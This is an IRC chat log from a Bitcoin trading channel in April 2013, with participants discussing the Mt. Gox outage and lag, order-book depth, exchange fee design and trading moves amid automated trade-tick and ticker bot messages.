beofre they shut down... Doh! Apr 12 00:58:51 i did similar, had an overnight bid for 25 @ 125 Apr 12 00:58:55 We may be moving into a new market pattern now though, so the strategies I exploited for the last 3 months may no longer work Apr 12 00:59:06 luckily i cancelled like 10 other bids i had up Apr 12 00:59:23 Bugpowder: how much was the 'bunch of cash' you had on gox before those trades? Apr 12 00:59:33 20% of my stack Apr 12 00:59:52 of combined BTC and cashed out value Apr 12 01:00:06 Not going to state specific position sizes anymore Apr 12 01:00:30 Wicked trading. Apr 12 01:00:36 np, didn't mean to intrude Apr 12 01:02:07 [BTCTC] [S.BBET-PT] 1 @ 0.00184 BTC [+] Apr 12 01:02:16 [BTCTC] [S.BBET-PT] 1 @ 0.00184 BTC [+] Apr 12 01:02:25 [BTCTC] [S.BBET-PT] 15 @ 0.00185 = 0.0278 BTC [+] Apr 12 01:02:27 [MPEX] [S.MPOE] 8500 @ 0.00070934 = 6.0294 BTC [-] Apr 12 01:02:41 [BTCTC] [S.BBET-PT] 15 @ 0.001889 = 0.0283 BTC [+] Apr 12 01:02:46 [BTCTC] [S.BBET-PT] 36 @ 0.00189 = 0.068 BTC [+] Apr 12 01:03:03 [HAVELOCK] [VTX] 1 @ 0.39798 BTC [+] Apr 12 01:03:05 it's very tempting to shoot off about specific $ figures, but also stupid to.. Also, whether you are trading $1,000,000 or $100, your emotions are probably more coupled to what % of your net worth is on the line, rather than a specific dollar value Apr 12 01:04:15 [BTCTC] [S.BBET-PT] 29 @ 0.00195 = 0.0566 BTC [+] Apr 12 01:05:14 The question now is, what is the right play when gox opens? Apr 12 01:05:28 would love to hear what people think Apr 12 01:06:18 i'm having trouble seeing the price drop lower than on outside exchanges Apr 12 01:06:33 like 65 or so now right? Apr 12 01:06:37 only thing counterbalancing that Apr 12 01:06:47 is that the bid book will be so thin Apr 12 01:06:58 if ANYONE is selling hard Apr 12 01:07:01 price will crash Apr 12 01:07:10 yeah Apr 12 01:07:13 bugpowder- since only people with $ on Gox can buy - and so many bitcoins to sell -Unless Gox bust trades or limits somehow Apr 12 01:07:15 it can go absolutely any way. Apr 12 01:07:16 the bid book is wiped out Apr 12 01:07:24 that's why you don't want idiots like mtgox involved in situations like these. Apr 12 01:07:36 We could be in for the mother of all spike ripples Apr 12 01:07:44 ;;bids 0 Apr 12 01:07:44 There are currently 94194264 bitcoins demanded at or over 0.0 USD, worth 5227579.67567 USD in total. | Data vintage: 12.8424 seconds Apr 12 01:07:44 prices stickyiness can cause anything Apr 12 01:07:48 ;;bids 50 Apr 12 01:07:49 There are currently 33641.267 bitcoins demanded at or over 50.0 USD, worth 2504465.676 USD in total. | Data vintage: 16.6801 seconds Apr 12 01:08:10 Yeah, the only way I see it ending up ok is if Gox has lined up buyers ahead of time Apr 12 01:08:20 otherwise flash crash Apr 12 01:08:23 Be aware that people will over react to every move Apr 12 01:08:24 due to the fact there is so much uncertainty, i think a likely scenario is a repate of last nights oscilations Apr 12 01:08:35 combined with lag Apr 12 01:08:45 will cause major swings Apr 12 01:09:04 if it opens, and lag isnt fixed, price will surely crash Apr 12 01:09:23 And then explode up Apr 12 01:09:26 and then crash Apr 12 01:09:26 yep Apr 12 01:09:27 [BTCTC] [GSDPT] 5 @ 0.00305 = 0.0153 BTC [+] Apr 12 01:09:29 yep Apr 12 01:09:31 [BTCTC] [GSDPT] 15 @ 0.0031 = 0.0465 BTC [+] Apr 12 01:09:41 Good bet for bitbet- mt gox trading engines strokes out in 10 minutes or less Apr 12 01:10:24 better to go for a big spread on your bid/ask, and not get filled, then to go for a narrow spread and get stuck in a losing position having scalped 10% Apr 12 01:10:30 lol srlsy Apr 12 01:10:53 jborkl_ well there's capitve cash on mtgox Apr 12 01:10:54 there Apr 12 01:11:01 's not (as much ?) capitve btc Apr 12 01:11:22 there is some captive BTC too Apr 12 01:11:28 [BTCTC] [S.MPOE-PT] 9 @ 0.00069 = 0.0062 BTC [+] Apr 12 01:11:31 tons of cash off the books right now Apr 12 01:11:32 [MPEX] [S.MPOE] 8950 @ 0.0006975 = 6.2426 BTC [-] Apr 12 01:11:32 the ? is how much of that cash has been requested for withdrawal Apr 12 01:11:37 only btc there, will be from people that fear/dislike/cant deal in fiat on other exchanges Apr 12 01:11:43 there are tight withdrawl lmits Apr 12 01:11:46 10k a day Apr 12 01:11:51 for verified Apr 12 01:11:54 not if you are apostilled Apr 12 01:12:01 apostilled lol Apr 12 01:12:08 lol Apr 12 01:12:08 If you are apostilled you proably have 500k on the exchange Apr 12 01:12:10 spelling Apr 12 01:12:20 otherwise its too much of a pita Apr 12 01:12:21 it's just funny, where they put the apostille, on your cock ? Apr 12 01:13:27 time for powernap until mtgox opens Apr 12 01:14:04 think we might actually see a little recovery in the meantime, 99-120 Apr 12 01:15:25 lmao Apr 12 01:15:31 watch it sit glued in the mp range Apr 12 01:15:59 I think greed will defeat fear in the end Apr 12 01:16:52 greed is on both ends though Apr 12 01:17:06 buyers and sellers Apr 12 01:17:52 i think people will need to use outside exchanges as reference Apr 12 01:18:27 but they will not, Gox is full of noobs that will be hitting sell and f5 Apr 12 01:18:35 maybe... Apr 12 01:18:37 or buy Apr 12 01:18:40 other people will buy Apr 12 01:18:57 but how much money do noobs really have Apr 12 01:19:00 it is going to be fun Apr 12 01:19:21 there were 15000 accounts waiting in the Q Apr 12 01:19:30 so, a bunch Apr 12 01:19:32 Just for the love of god... don't place a market order. Apr 12 01:19:55 lol Apr 12 01:20:21 http://dealbook.nytimes.com/2013/04/11/as-big-investors-emerge-bitcoin-gets-ready-for-its-close-up/ Apr 12 01:20:37 I have some money on there and know what price I am putting my limit at- I hope it gets filled Apr 12 01:21:38 I hope the vwap never goes below 122. Apr 12 01:21:39 Winklevii — as they are popularly known — say they own nearly 1 percent of that, or some $11 million. Apr 12 01:21:49 everyone claiming 100k btc like it's a trend Apr 12 01:22:15 i have a 100k sdice Apr 12 01:22:23 fo fuck you twins Apr 12 01:22:25 so Apr 12 01:22:27 hehe Apr 12 01:22:48 inb4 facebook launches bitcoin payments Apr 12 01:23:04 if facebook does it it will suck Apr 12 01:23:09 facecoin! Apr 12 01:23:18 itll be just as cool as facebook gifts Apr 12 01:24:02 [HAVELOCK] [VTX] 28 @ 0.39798 = 11.1434 BTC [+] Apr 12 01:24:23 @maxkeiser 5h Could a Patent Lawsuit Take Down the Bitcoin Exchanges Like MtGox??? Apr 12 01:24:37 yeah totally. we need more huffpo intelligent bitcoin discussion Apr 12 01:24:48 hopefully the hos are doing it nude while balancing sandwich plates. Apr 12 01:25:00 https://www.facebook.com/appcenter/bitcoin-tx?fb_source=appcenter Apr 12 01:29:02 mircea_popescu: lol Apr 12 01:30:06 Service is down for emergency maintenance for one hour, until 2013-04-11 23:30:00 UTC. Please retry at that time Apr 12 01:30:12 mtgox Apr 12 01:31:16 emergency ? Apr 12 01:31:19 wasn't this scheduled ? Apr 12 01:31:32 all the btcz is gone Apr 12 01:31:33 This is the front page now Apr 12 01:31:48 maybe now they are really doing the change over Apr 12 01:31:54 maybe they don't know wmat emergency means. Apr 12 01:32:01 everyone says "scheduled" when they mean emertgency, Apr 12 01:32:05 mtgox goes the other way around. Apr 12 01:32:16 yeah they could be saying it like we have been so successful, its an emergency Apr 12 01:32:22 hah Apr 12 01:32:37 we are an emergency of our own success. Apr 12 01:33:02 gox crashes, MT eats pizza and sweats Apr 12 01:33:02 [HAVELOCK] [VTX] 5 @ 0.39798 = 1.9899 BTC [+] Apr 12 01:33:10 mount cocks Apr 12 01:33:35 *magic the gathering online exchange Apr 12 01:34:02 [HAVELOCK] [VTX] 2 @ 0.39799 = 0.796 BTC [+] Apr 12 01:35:31 Apr 11 09:23:40 Ad0: sweating right now Apr 12 01:35:34 https://twitter.com/MagicalTux/status/322317865443274752/photo/1 Apr 12 01:36:33 hah Apr 12 01:40:54 [BTCTC] [ASICMINER-PT] 2 @ 0.731 = 1.462 BTC [-] Apr 12 01:41:12 [BTCTC] [ASICMINER-PT] 1 @ 0.730211 BTC [-] Apr 12 01:41:13 [BTCTC] [ASICMINER-PT] 1 @ 0.73021 BTC [-] Apr 12 01:41:16 [BTCTC] [ASICMINER-PT] 2 @ 0.7302 = 1.4604 BTC [-] Apr 12 01:41:19 [BTCTC] [ASICMINER-PT] 20 @ 0.73019 = 14.6038 BTC [-] Apr 12 01:41:22 [BTCTC] [ASICMINER-PT] 3 @ 0.73 = 2.19 BTC [-] Apr 12 01:41:24 [BTCTC] [ASICMINER-PT] 3 @ 0.72 = 2.16 BTC [-] Apr 12 01:44:16 https://bitcointalk.org/index.php?topic=173782.0 Apr 12 01:44:19 btc-e issues ? Apr 12 01:45:33 i saw that earlier... then "moni3z" says: You will get your LTC don't worry Apr 12 01:45:37 wat!? Apr 12 01:46:02 [HAVELOCK] [HIM] 4 @ 1.6 = 6.4 BTC [-] Apr 12 01:46:03 i dunno Apr 12 01:46:11 did that btcex guy just disappear? Apr 12 01:47:28 which one is that ? Apr 12 01:48:02 mircea_popescu: the guy who used to run btcex a couple years ago Apr 12 01:48:17 i weirdly have no recollection of this at all. who the f ? Apr 12 01:48:31 he was funny, put a bounty up to hack mtgox, did a lot of other insane stuff, trolled bitcointalk ~2011 Apr 12 01:48:45 but yeah used to run an exchange that went under around then Apr 12 01:48:46 o wait Apr 12 01:48:49 russian guy i think Apr 12 01:48:52 went away like mid 2012 neh ? Apr 12 01:49:30 https://bitcointalk.org/index.php?topic=6864.0 << here's one of his threads Apr 12 01:49:34 [BTCTC] [BTC-TRADING-PT] 1 @ 0.16169 BTC [+] Apr 12 01:49:39 https://bitcointalk.org/index.php?topic=94649.0 Apr 12 01:49:47 ya guy was a serial exchange entrepreneur. Apr 12 01:50:02 [HAVELOCK] [VTX] 5 @ 0.39798 = 1.9899 BTC [-] Apr 12 01:51:50 [BTCTC] [S.DICE-PT] 75 @ 0.0034 = 0.255 BTC [+] Apr 12 01:53:15 [BTCTC] [BASIC-MINING] 1 @ 0.3985 BTC [-] Apr 12 01:55:45 [BTCTC] [BASIC-MINING] 9 @ 0.3989 = 3.5901 BTC [+] Apr 12 01:57:19 Jesus Christ. Denninger is trolling my FB page. Apr 12 01:58:07 sometimes referred to as a founding member of the Tea Party movement. << the guy is probably a cockmeat sandwich Apr 12 01:58:38 o is he the nut from before ? Apr 12 01:58:55 with the bitcoin is not a good currency because can't be made into a responsible dildo ? Apr 12 01:58:56 http://imgur.com/F35l2Sl Apr 12 01:59:11 http://en.wikipedia.org/wiki/Karl_Denninger Apr 12 01:59:27 Tell him that vacuums are actually a multi-billion dollar industry Apr 12 01:59:28 [BTCTC] [BTC-TRADING-PT] 10 @ 0.1617 = 1.617 BTC [+] Apr 12 02:00:39 [BTCTC] [COGNITIVE] 10 @ 0.1399 = 1.399 BTC [+] Apr 12 02:01:11 Bugpowder: what a douchebag Apr 12 02:02:45 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1617 = 0.3234 BTC [+] Apr 12 02:03:21 [BTCTC] [COGNITIVE] 3 @ 0.1399 = 0.4197 BTC [+] Apr 12 02:03:26 so no AM update? Apr 12 02:12:21 this is the only refuge of sanity on irc.......everyone else is freaking out about USD loses...... Apr 12 02:12:45 ^^^ Apr 12 02:13:23 any idea how long its safe to reuse a gox deposit address? I want to send funds there, but can't log in. Apr 12 02:13:42 one in my wallet aren't that recently made Apr 12 02:14:38 i wouldn't. Apr 12 02:14:39 Gox is down, I wouldn't be touching them until they're back up Apr 12 02:14:46 personally i would wait until they can generate you a new one. who knows if they've changed wallets or whatever. Apr 12 02:14:51 yeah - that's what Im thinking Apr 12 02:14:58 yeah, aside from not using gox at all lol Apr 12 02:15:04 and use something other than mttox. Apr 12 02:15:21 ya - this is a special occasion though - I just want to take advantage of the mayhem Apr 12 02:15:28 darn it... I sent 100 BTC to MtGox Apr 12 02:15:28 [BTCTC] [ASICMINER-PT] 1 @ 0.71 BTC [-] Apr 12 02:15:30 1FEUCcszrBBMMMm1UwNK8mwFQF29mE39bM Apr 12 02:15:32 I rarely have anything in there (thus no recent deposit addy) Apr 12 02:15:36 Nice repeating pattern Apr 12 02:15:50 Feu (fire) Cc, BB, MMMm Apr 12 02:15:55 [BTCTC] [ASICMINER-PT] 1 @ 0.701 BTC [-] Apr 12 02:16:04 looks funny Apr 12 02:16:13 I want it as vanity url... Apr 12 02:16:23 Namworld are you sleepy "? Apr 12 02:16:31 hah Apr 12 02:16:35 Possibly... Apr 12 02:16:53 [MPEX] [S.MPOE] 3950 @ 0.0006975 = 2.7551 BTC [-] Apr 12 02:16:55 [MPEX] [S.MPOE] 6887 @ 0.00069712 = 4.8011 BTC [-] Apr 12 02:16:56 [MPEX] [S.MPOE] 2563 @ 0.00069557 = 1.7827 BTC [-] Apr 12 02:16:57 Leave me to my delirium. I'm having fun. Apr 12 02:17:02 np np Apr 12 02:17:09 Time to get some sushi and sake to prepare for the mayhem Apr 12 02:17:17 lol Apr 12 02:17:21 if gox delays opening though... I will be PISSED Apr 12 02:17:28 Living it big? Apr 12 02:17:31 open at 3am EDT Apr 12 02:17:40 Still got enough to live large Apr 12 02:18:14 eheh Apr 12 02:18:15 but I might not buy that art car now.. http://burners.me/2013/04/09/your-own-art-car-wunders-rockbox-on-the-auction-block/ Apr 12 02:18:27 Had some discussions with the owner yesterday Apr 12 02:18:29 ok well... I'm going to go eat something before gox reopens... Apr 12 02:18:41 after the gox ripple trade Apr 12 02:18:43 Better have a full stomach and be rested so I can stick around Apr 12 02:19:05 how long is it ? Apr 12 02:19:07 Bugpowder: holy shit you were going to buy that thing?!?? Apr 12 02:19:12 yup Apr 12 02:19:19 we got a camp Apr 12 02:19:30 having someone head up to Ft Bragg to scope it this weekend Apr 12 02:19:30 he's a campy fag at heart :D Apr 12 02:19:35 for burning man? Apr 12 02:20:00 of course! Apr 12 02:20:02 jeeze Apr 12 02:20:06 lol Apr 12 02:20:14 WOW Apr 12 02:20:18 Not feeling bitrich anymore though Apr 12 02:20:32 dude. Apr 12 02:20:43 Also I'm sober Apr 12 02:20:54 discussions were after a Stone IPA pint. Apr 12 02:21:18 people arn't ready for bitcoins yet Apr 12 02:22:14 hahah - those stones are strong Apr 12 02:27:10 [MPEX] [S.MPOE] 5937 @ 0.00069557 = 4.1296 BTC [-] Apr 12 02:27:12 [MPEX] [S.MPOE] 6963 @ 0.00069538 = 4.8419 BTC [-] Apr 12 02:29:29 stone ipa is pretty good stuff Apr 12 02:29:37 haha, the thing lights up! Apr 12 02:29:46 ? Apr 12 02:29:51 oh the car Apr 12 02:30:02 oh yeah sorry someone is talking in my ear Apr 12 02:39:51 ;;eightball will mtGox crash at 2am Apr 12 02:39:51 You know the answer better than I. Apr 12 02:40:22 (yes) Apr 12 02:40:23 ;;eightball yes but please, answer the question Apr 12 02:40:23 What are you asking me for? Apr 12 02:40:51 ;;eightball should i sold all my btc Apr 12 02:40:52 The outlook is good. Apr 12 02:53:57 anothe rtrade hapnd on Gox Apr 12 02:54:02 Last price:$124.90000 Apr 12 02:55:13 heh Apr 12 03:03:38 [BTCTC] [ASICMINER-PT] 10 @ 0.701 = 7.01 BTC [-] Apr 12 03:14:03 [HAVELOCK] [HIM] 2 @ 1.3 = 2.6 BTC [-] Apr 12 03:24:03 [HAVELOCK] [HIM] 1 @ 1.21 BTC [-] Apr 12 03:24:05 [MPEX] [S.MPOE] 538 @ 0.00069538 = 0.3741 BTC [-] Apr 12 03:25:01 [HAVELOCK] [HIM] 2 @ 1.2 = 2.4 BTC [-] Apr 12 03:26:02 [HAVELOCK] [KCIM] 1 @ 1.14 BTC [-] Apr 12 03:27:02 [HAVELOCK] [SDICE] 1 @ 0.3659995 BTC [+] Apr 12 03:35:11 $avg Apr 12 03:35:14 mircea_popescu: 125.94 Apr 12 03:40:11 well, it'll be interesting to see where this thing goes when mount cawks reopens Apr 12 03:41:03 all i want to see is mtgox volume < 10k for the day. Apr 12 03:41:28 that'd be something Apr 12 03:48:14 there'll be plenty volume when they open Apr 12 03:48:34 I am going to do 10k today Apr 12 03:48:40 assuming no 502 errors Apr 12 03:48:50 anyway. cahtch you all later. Apr 12 03:48:50 Bugpowder: you had some nice trades yesterday Apr 12 03:48:55 c-a Apr 12 03:48:58 *ya Apr 12 03:49:03 hope tonight is a repeat **** BEGIN LOGGING AT Fri Apr 12 12:32:13 2013 Apr 12 12:32:32 ahhh Apr 12 12:32:35 so how we doin' Apr 12 12:32:36 ;;ticker Apr 12 12:32:38 BTCUSD ticker | Best bid: 90.69400, Best ask: 90.69404, Bid-ask spread: 0.00004, Last trade: 90.69404, 24 hour volume: 206604.44982419, 24 hour low: 65.00000, 24 hour high: 168.00000, 24 hour vwap: 104.07735 Apr 12 12:32:40 hey mircea_popescu Apr 12 12:32:48 a little low huh Apr 12 12:37:29 [MPEX] [S.MPOE] 4835 @ 0.00067922 = 3.284 BTC [-] Apr 12 12:37:30 [MPEX] [S.MPOE] 5501 @ 0.00067854 = 3.7326 BTC [-] Apr 12 12:39:06 http://arstechnica.com/business/2013/04/taming-the-bubble-investors-bet-on-bitcoin-via-derivatives-markets/ Apr 12 12:39:15 yea, just told my family to start getting in Apr 12 12:39:23 retards ^^^ how do they talk about "derivatives" without actually mentioning derivatives Apr 12 12:41:00 MJR_ it's a talent. Apr 12 12:41:16 they are probably waiting for me to send them gifts and pat them on the head. Apr 12 12:41:33 which is nice because i never will. they can come to me on knees and get something or else keep on prattling. Apr 12 12:41:52 i get that they should have mentioned mpex... Apr 12 12:42:01 but my point is that they should have mentioned a derivative Apr 12 12:42:10 hedge fund !=derivative Apr 12 12:42:13 nor does shorting Apr 12 12:42:18 or leveraged trading Apr 12 12:42:47 are you ready for the lulz today Apr 12 12:42:54 the "50x faster engine" Apr 12 12:43:00 so...they basically say financial derivatives can stablize markets (US govt banned onion futures and they are now volatile) so given that info Apr 12 12:43:00 MJR_ yea well... Apr 12 12:43:08 lets not talk about an actual derivative at all Apr 12 12:43:20 in my experience it's kinda how this stuff goes. may be wrong. Apr 12 12:43:27 ;;goxlag Apr 12 12:43:29 MtGox lag is 2.570025 seconds. During this time, light travels 0.00515030132457 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 12 12:43:40 well... 2.57 seconds is 50x faster than something... Apr 12 12:44:03 2.57 seconds with roughly 30 trades in the last minute Apr 12 12:44:21 lol Apr 12 12:44:30 anyway their lag problem should be resolved tghe other way Apr 12 12:44:33 everyone quitting. Apr 12 12:46:38 i.imgur.com/ngMsLqr.png Apr 12 12:47:30 error4733: very nice, which website is that Apr 12 12:48:33 reddit? Apr 12 12:51:19 or maybe the address in the address bar ? Apr 12 12:51:34 :) Apr 12 12:52:10 ;;eightball should i stay in my bed get laida Apr 12 12:52:10 Yes! Apr 12 12:52:29 thanks eightball Apr 12 12:52:42 ;;goxlag Apr 12 12:52:43 MtGox lag is 79.565712 seconds. During this time, light travels 0.159448795986 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 12 12:52:46 wahahahahah Apr 12 12:53:15 ;;eightball will my boss undesrtand i keep me tmrw Apr 12 12:53:16 What are you asking me for? Apr 12 12:53:18 ;;eightball will my boss undesrtand i keep me tmrw Apr 12 12:53:18 You know the answer better than I. Apr 12 12:54:05 ;;eightball will my boss know i fuck is daugter ? Apr 12 12:54:05 You're kidding, right? Apr 12 12:54:27 lol Apr 12 12:54:32 is she hot ? Apr 12 12:54:37 [BTCTC] [CRYPTO-TRADE] 79 @ 0.2 = 15.8 BTC [+] Apr 12 12:54:51 no Apr 12 12:54:57 Scrat well... it's 50x faster than 4000 seconds ? Apr 12 12:56:10 resume for the last 6h ? no more drama ? Apr 12 12:56:25 nothing much. Apr 12 12:58:48 GOOD, pain in the ass to explain if btc was crash to 20$ ut this, 90$ is juste a correction from th last 3 crazy week ! hope next bubble i got some ball to short when a crash is obv Apr 12 12:59:59 i just pretty much ignored whole bubble. not worth to mess with one's nerves like that. Apr 12 13:00:31 might buy few next month calls soon, nothing else. Apr 12 13:00:39 $avg Apr 12 13:00:40 taub: 97.18 Apr 12 13:00:46 :> Apr 12 13:07:28 the good news is that based on 24 jhour data mtgox is down under 50% of volume Apr 12 13:07:48 if this trend continues and in a week they're 20-30% this will all have been well worth it. Apr 12 13:08:31 [MPEX] [S.MPOE] 13666 @ 0.00067363 = 9.2058 BTC [-] Apr 12 13:15:18 the pricing of options seem to have changed... Apr 12 13:15:56 yeah, because the pricing of usd/btc has changed... Apr 12 13:17:18 fair enough, so strikes ned to be extended way beyond 500 to have prices flatten out at ~0.059? Apr 12 13:23:41 bitesak_ the bot's volatility sense has been utterly overloaded these past few days Apr 12 13:24:13 i think some assumptions baked into it originally (2011, that is) melded security with actual pricing at the edge cases. Apr 12 13:24:41 we could say it's seeing more of a "catastrophic event" than normal market conditions. Apr 12 13:26:49 thanks. call options for Next month are the same price as This month as of strike 386 Apr 12 13:29:38 and thank you mircea_popescu for your reliable and great service you offer. it does stick out nowadays. Apr 12 13:35:01 bitesak_ thanks for noticing. Apr 12 13:35:15 the fact is this recent price nonsense has been drowning out legitimate bitcoin interest and investment Apr 12 13:35:21 in a flood of noobish speculators. Apr 12 13:35:51 they have gotten well stung tho, and stinging will continue until people understand that bitcoin is actually useful and actually valuable, not a get rich quick scheme of the week. Apr 12 13:37:03 also from the good news department, https://bitcointalk.org/index.php?topic=174549.0 Apr 12 13:39:14 let's focus on the good and let it grow and appreciate Apr 12 13:39:36 rip gox Apr 12 13:41:27 bitesak_ yes. still, it's hard to explain to people the investment virtues of bitcoin Apr 12 13:41:34 atop a cacophony of experts a la max keiser. Apr 12 13:43:39 as you said, say the truth no matter the context, just make sure tis the truth Apr 12 13:44:03 have any of you seen/read this? http://www.infowars.com/bitcoin-crashes-over-50-just-one-day-after-bold-public-prediction-by-mike-adams-of-natural-news/ Apr 12 13:44:35 goxlag Apr 12 13:44:38 ;;goxlag Apr 12 13:44:39 MtGox lag is 112.75835 seconds. During this time, light travels 0.225966470895 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 12 13:45:39 ZedsterX there's about fiddy billion people claiming they called it by now. Apr 12 13:45:47 it's how these fringe outfits survive. Apr 12 13:46:12 watch the vid really read the article try not to be so high and mighty all the time mP Apr 12 13:47:38 am off_ Apr 12 13:47:43 the part about bitcoinbillionaire is the most interesting Apr 12 13:47:55 ZedsterX i rarely watch a vid. care to summarize ? Apr 12 13:49:06 "Wednesday’s wild ride came as someone gave away thousands of dollars worth of Bitcoins on Reddit, the social news site. News blog Business Insider calculated a Reddit user under the name “Bitcoinbillionaire” had given away $13,627.69896 worth of Bitcoins to Reddit users over the day." Apr 12 13:49:38 mircea_popescu: I think it's time for you to invest in CSS Apr 12 13:50:10 he say BTCbillionnaire was central banks Apr 12 13:50:37 so somebody gave away 13k worth of btc on reddit and therefore crash. this is the public statement ? Apr 12 13:50:53 Scrat why ? Apr 12 13:50:59 not the point Apr 12 13:51:11 ZedsterX well, so state the point Apr 12 13:51:15 because UX matters Apr 12 13:51:20 start by stating the point is a great policy anyway. Apr 12 13:51:37 Scrat certainly. where's css get into ux ? Apr 12 13:52:06 by making it more readable? i mean unformatted tables, come on Apr 12 13:52:16 UX matters to some Apr 12 13:52:35 Scrat you have lost your argument here. so, ux matters. here's the ux : Apr 12 13:52:37 $mpexlag Apr 12 13:52:39 mircea_popescu: 0.110823869705 seconds Apr 12 13:52:50 the other part of ux is the 0.2% sell side only fee. Apr 12 13:53:02 that's 1/10 what mtgox charges, for arguably much more service. Apr 12 13:53:04 this is ux. Apr 12 13:53:31 gpg signed contracts, that's ux. Apr 12 13:54:01 how about instant deposits? That would be nice Apr 12 13:54:03 or in other words : ux is for USERS only. there's no suchj thing as vx, visitor experience. Apr 12 13:54:09 pizzaman1337 also unsafe. Apr 12 13:54:19 unsafe to accept money coming in? Apr 12 13:54:22 remember the recent hard fork ? i wouldn't trust the current codebase. Apr 12 13:54:23 yes. Apr 12 13:54:29 ah, true Apr 12 13:54:34 i'd end up having to cancel trades daily or some shit Apr 12 13:54:40 even once a year is too much for people to stomach. Apr 12 13:54:55 isn't it easy to monitor for blockchain forks? Apr 12 13:55:13 it is impossible to do, because these are emergent phenomena. Apr 12 13:55:27 nobody really has a clue what bitcoin code does, and the devs are resisting tooth and nail any attermpt to specify it Apr 12 13:56:00 [MPEX] [S.MPOE] 120 @ 0.00067687 = 0.0812 BTC [+] Apr 12 13:56:11 [BTCTC] [GSDPT] 3 @ 0.00319 = 0.0096 BTC [+] Apr 12 13:59:30 [MPEX] [S.DICE] 4000 @ 0.00316043 = 12.6417 BTC [-] Apr 12 13:59:32 [MPEX] [S.DICE] 1000 @ 0.00349999 = 3.5 BTC [+] Apr 12 13:59:43 [MPEX] [S.DICE] 700 @ 0.0035 = 2.45 BTC [+] Apr 12 13:59:45 [MPEX] [S.DICE] 1500 @ 0.00373 = 5.595 BTC [+] Apr 12 13:59:51 [MPEX] [S.DICE] 2800 @ 0.00373333 = 10.4533 BTC [+] Apr 12 14:01:52 How much did you lose\get, people? Apr 12 14:02:07 this ain't otc, cylta Apr 12 14:02:56 mircea_popescu: I just wanted to know, did you able to make it profitable for you, or not =) Apr 12 14:03:08 and did you able to predict it or not Apr 12 14:03:43 ;;market buy --usd 130000 Apr 12 14:03:44 A market order to buy 130000.0000 USD worth of bitcoins right now would buy 1618.5055 bitcoins and would take the last price up to 82.0000 USD, resulting in an average price of 80.3210 USD/BTC. | Data vintage: 27.2853 seconds Apr 12 14:04:04 [MPEX] [S.MPOE] 660 @ 0.00067687 = 0.4467 BTC [+] Apr 12 14:04:24 Cylta i take it you've not seen http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege ? Apr 12 14:06:10 ;;asks 100 Apr 12 14:06:11 There are currently 11619.268 bitcoins offered at or under 100.0 USD, worth 1054970.02346 USD in total. | Data vintage: 29.2044 seconds Apr 12 14:07:27 [MPEX] [S.MPOE] 4953 @ 0.00067687 = 3.3525 BTC [+] Apr 12 14:11:16 mircea_popescu: Okay, so you knew it. Very good, just checking you =) Apr 12 14:11:20 :p Apr 12 14:11:36 most people knew i would say. Apr 12 14:11:54 maybe some didn't know they knew. anyway. Apr 12 14:12:27 Some people (actually, a lot) expected that "bitcoin is about to explode!11" Apr 12 14:13:02 ugh...when will people learn that stupid systems can't be saved by more hardware Apr 12 14:13:21 MJR_ depends who's people. people with no competence won't develop it magically. Apr 12 14:13:33 Cylta1 ya well... Apr 12 14:13:38 it is just a retardly simple fix Apr 12 14:13:55 but for some reason, they would rather halt trading for 12 hours to set up new servers Apr 12 14:14:00 and still not fix the problem Apr 12 14:14:27 $goxlag Apr 12 14:14:34 ... Apr 12 14:14:43 $goxlaglag Apr 12 14:14:46 ;;goxlag Apr 12 14:14:47 MtGox lag is 1.38465 seconds. During this time, light travels 0.00277482309669 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 12 14:14:49 a ok Apr 12 14:15:11 it hit 30 seconds like 2 minutes ago Apr 12 14:15:21 and its because i see all the bullshit orders coming in and out Apr 12 14:15:28 i am streaming their data Apr 12 14:15:38 and they just have a ton of orders for .05 btc Apr 12 14:16:06 i think it would be way less radical to just change min order size than to shut down for 12 hours Apr 12 14:16:12 mjr_ did not plan for it and afraid to break it... Apr 12 14:16:18 they should do a stable fee of 0.001 btc per order in addition to 0.6%.. Apr 12 14:16:28 i know this fear firsthand now Apr 12 14:16:30 yeah, you could just change fee schedule Apr 12 14:16:32 to avoid spam Apr 12 14:16:56 anyway, to treat an order for .05 btc the same as one for 100 btc is retarded Apr 12 14:17:12 its called toxic order flow Apr 12 14:17:21 and IRL they will disable your account Apr 12 14:17:28 if you spam orders like that Apr 12 14:18:06 it's better to have built-in protection in system Apr 12 14:18:18 than to fix afterwards with fees Apr 12 14:18:28 i agree... Apr 12 14:18:37 you could implement a system in a ton of different ways Apr 12 14:18:40 prioritze by size Apr 12 14:18:48 higher fees for lower size Apr 12 14:18:53 block lower size completely Apr 12 14:18:59 etc... Apr 12 14:19:09 any one of those would prob reduce their stress by 90% Apr 12 14:19:16 no. i just did it so that one user can't place two orders at once. has to wait for the first one to return from mpex Apr 12 14:19:19 instead of "everyone stop for 12 hours" Apr 12 14:19:29 i was talking about gox Apr 12 14:19:30 limit it to n orders per x ? Apr 12 14:19:37 there you go Apr 12 14:19:40 that would work too Apr 12 14:19:52 any of those systems would be better than bringing up another server Apr 12 14:20:39 not that its bad to bring up more servers...but if you have a stupid unscalable system in place, it really doesn't matter how much more hardware you have Apr 12 14:20:49 heck, even theymos can't be brought to spend to improve the forum Apr 12 14:20:51 unless you can grow your hardware exponentially i suppose Apr 12 14:21:12 it's just they found themselves in dark place and feel too paralyzed about everything Apr 12 14:21:13 jurov yea isn't that interesting ? only forum in the world that had 1mn usd at any point Apr 12 14:21:19 no help there, i guess Apr 12 14:21:25 heh. ui think you're exactly correct. Apr 12 14:21:26 i'm also surprised that more people don't just use amazon cloud Apr 12 14:21:57 i really wonder what their office was like today Apr 12 14:22:15 fast food and whatever Apr 12 14:22:18 didn't the guy put pix up ? Apr 12 14:22:20 i've really been curious about the ACTUAL volume they do # of transactions Apr 12 14:22:24 not # of bitcoins Apr 12 14:22:35 yeah i saw the pizza photo Apr 12 14:25:42 [MPEX] [S.MPOE] 14237 @ 0.00069911 = 9.9532 BTC [+] Apr 12 14:25:44 [MPEX] [S.MPOE] 11696 @ 0.00069963 = 8.1829 BTC [+] Apr 12 14:27:24 they should look at 0MQ or something like that Apr 12 14:27:25 :) Apr 12 14:28:00 my friend and coworker just designed his optimized version of that, which outperforms it...i think he gets 350k messages per second... Apr 12 14:28:08 [BTCTC] [ASICMINER-PT] 2 @ 0.7589 = 1.5178 